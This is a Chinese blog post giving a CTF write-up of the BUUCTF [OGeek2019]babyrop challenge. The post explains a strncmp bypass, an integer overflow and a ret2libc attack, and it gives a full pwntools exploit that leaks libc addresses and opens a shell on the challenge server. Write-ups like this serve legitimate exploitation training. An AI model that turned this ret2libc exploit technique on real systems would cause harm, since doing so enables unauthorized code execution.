pwn刷题num25---- strncmp绕过 + 整数溢出 + ret2libc

已于 2022-04-26 23:01:52 修改
阅读量995 收藏 2
点赞数 1
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 python c语言 网络安全 安全
于 2022-04-26 21:18:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124435591
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-[OGeek2019]babyrop

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

32位程序,小端序
开启RELRO-----got表不可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

程序运行后,嗯。。啥也没有,
ida一下看一下主函数
在这里插入图片描述
首先调用一个sub_80486BB()函数·
在这里插入图片描述
一些打初始化的操作
然后打开了一个文件/dev/urandom,读取了四个字符,然后调用一个函数·,size_11(buf),返回值赋给v2,
在这里插入图片描述
sprintf函数先将a1以字符串形式打印出来,之后read函数从输入流读取0x20字节(就是我们输入的name),buf距离返回地址为0x2c大于读入的0x20,无法栈溢出,之后又比较字符串buf和size的大小,不相等则exit(0),退出程序,这里可以先给buf输入0,让strncmp函数遇到第一个字符就是0,结束比较,返回值0,跳过exit(0)函数
最后return number,再看一下主函数里的另一个函数yi_chu(v2)

在这里插入图片描述
两个危险的read函数,第一个read函数读入0xc8字节,看一下buf的栈区
在这里插入图片描述
在这里插入图片描述

距离返回地址(0xe7+4)字节,无法进行栈溢出
而第二个read函数,往buf里读入a1字节,这里的a1就是主函数里的v2,就是size_11函数的返回值(number)
看一下number的栈区,距离buf0x7字节(0x2c-0x25)
在这里插入图片描述

思路

通过v6 = read(0, buf, 0x20u),将number覆盖为很大的值,number的类型unsigned __int8就是无符号字符型,
在这里插入图片描述
而这里的a1是char型,有符号字符型,明显的整数溢出,为了跳过第一个read函数,所以将number覆盖为0xff(11111111)(127的二进制码为01111111)
在这里插入图片描述
之后找一下后门函数,发现没有,,又是ret2libc,
这次用write函数泄露libc基地址,这次使用题目中给的libc,用LibcSearcher工具搜到的libc都不太对。。。。。。
exp

from pwn import  *
context(endian='little',os='linux',arch='i386',log_level='debug')#小端序,linux系统,32位架构,debug
sh = remote('node4.buuoj.cn',29144)
elf = ELF('./pwn1') 
libc = ELF('./libc-2.23.so')
sh.sendline(b'\x00'+b'a' * 6 + b'\xff')   		#先输入0,跳过exit(0)函数,最后输入0xff,覆盖number为ff

write_plt = elf.plt['write']	
write_got = elf.got['write']
main = 0x8048825    #ida中找
#第一次栈溢出泄露write函数真实地址
payload = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(8) 
sh.sendlineafter(b"Correct\n",payload)

write_addr = u32(sh.recv(4))
print('write_addr = ' + hex(write_addr))

base = write_addr - libc.sym['write']
system = base + libc.sym['system']

binsh = base + 0x0015902b  # 0x0015902b为libc中的/bin/sh字符串的地址
sh.sendline(b'\x00'+b'a' * 6 + b'\xff')
#第二次栈溢出执行system函数,获得shell
payload = b'a' * (0xe7 + 4) + p32(system) + p32(main) + p32(binsh) 
sh.sendlineafter(b"Correct\n",payload)
sh.interactive()

执行代码获得shell
在这里插入图片描述

在这里插入图片描述

tbsqigongzi
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学校的简单入门题PWN
EternalBurning的博客
11-09 531
学校的简单入门题PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门题的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2153
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
welpwn pwn 入门题
02-11
pwn 入门题
libc-database:建立libc偏移量数据库以简化开发
04-01
网页界面 libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何东西两次,因此您也可以使用它来更新数据库: $ ./get # List categories $ ./get ubuntu debian # Download Ubuntu's and Debian's libc, old default behavior $ ./get all # Download all categories. Can take a while! 您还可以将自定义libc添加到数据库中。 $ ./add /usr/lib/libc-2.21.so 在数据库中找到在给定地址上具有给定名称的所有libc。 仅检查最后12位,因为随
buuctf pwn [OGeek2019]babyrop_wp
HeyGap的博客
07-21 114
网上很多wp已经不适用了,所以来更新一波XD。
CTF笔记:溢出利用
PwnGuo的博客
05-19 943
整数溢出 典型整数溢出利用 这个 v3 是一个无符号数,最大只能 255,如果超过的话就会进行 mod 255所以可以传入一个总共是 0x105 的, 这样他的得到的就是 6 是符合长度限制的,从而绕过 if 的检测dest 的大小是 0x11h,加上 ebp 的 0x4h,所以需要在前面填充 0x15h 后门程序 exp: python2 #coding=utf-8 from pwn import * p=remote('node3.buuoj.cn',29748) p.recvuntil("na
BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)
半岛铁盒的博客
08-02 479
32位开启了nx保护 没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目 main函数就调用了一个vuln函数 7行的输入函数不是get,是程序自定义的函数get_n a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出) 一开始输入负数,绕过长度限制,造成溢出 利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址 溢出覆盖返回地址去执行sy
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 716
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
pwn刷题num4---整数溢出上溢+栈溢出
tbsqigongzi的博客
04-21 807
攻防世界pwn新手区int_overflow 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 程序运行后让我们选择login(登陆)或exit(退出) 选1,之后输入username(用户名),之后输入passwd(密码),最后只给我们一个success 直接ida看伪代码
[OGeek2019]babyrop
ethan18的博客
07-24 173
后面的内容就是和ret2libc是一样的思路了,不过这次我学乖了,我还是使用了Libcsearcher,在线网站虽然也可以,但是还是太折磨人了,至少在工作量方面Libcsearcher是真的好用。知道了这点以后,我们也只是知道了第一个输入的是\x00,并且我们的buf[7],也就是第8个字符会返回,然后其会进入第二个函数,接着看第2个函数。这可能是我做这几天题目中的一个最经典的小Trick(上一个博客那个强行覆盖got表中的字符串的思路简直是个大trick,思路对我来说惊为天人)然后进入ida pro。
ctf pwn 刷题记录 buuctf
m0_64195960的博客
04-11 299
[OGeek2019]babyrop 1 这题的知识点是一个ret2libc3和一个绕过随机数 1)checksec一下看一下保护 好的 2)丢尽ida看一下 1、首先是搞懂main函数 fd就是一个打开生成随机数文件 read函数将生成的随机数放到buf 然后进入第一个sub_804871F 2.瞧一瞧sub_804871F 1、memset的作用完成数组初始化,全部为0 2、sprintf的作用 原型 int sprintf( char *buffer, cons
pwn刷题num39----整数溢出
tbsqigongzi的博客
05-02 425
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看一下主函数 char buf; // [rsp+0h] [rbp-10h] ..... ...... ...... ........ if ( (signed int
PWN-整数溢出
recover517的博客
12-06 1662
一、特殊数字 二、整数字节对照表 三、溢出类漏洞 四、符号转换类漏洞
24 内核开发- Linux 内核各种设计模式
最新发布
jxusthusiwen的专栏
05-15 1073
内核使用桥接模式将文件系统抽象与具体的文件系统实现分离开来,如 ext4 和 XFS。实现: 内核使用策略模式来选择不同的内存管理算法,如 Buddy 系统和 SLOB。实现: 文件系统使用观察者模式来通知 inotify 模块文件系统更改。实现: 内核使用责任链模式将系统调用请求传递给一系列内核函数。实现: 内核使用状态模式来管理进程的状态,如运行、等待和停止。实现: 内核使用模板方法模式来实现文件系统操作,如读写文件。实现: 内核使用代理模式来限制对系统调用和文件操作的访问。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值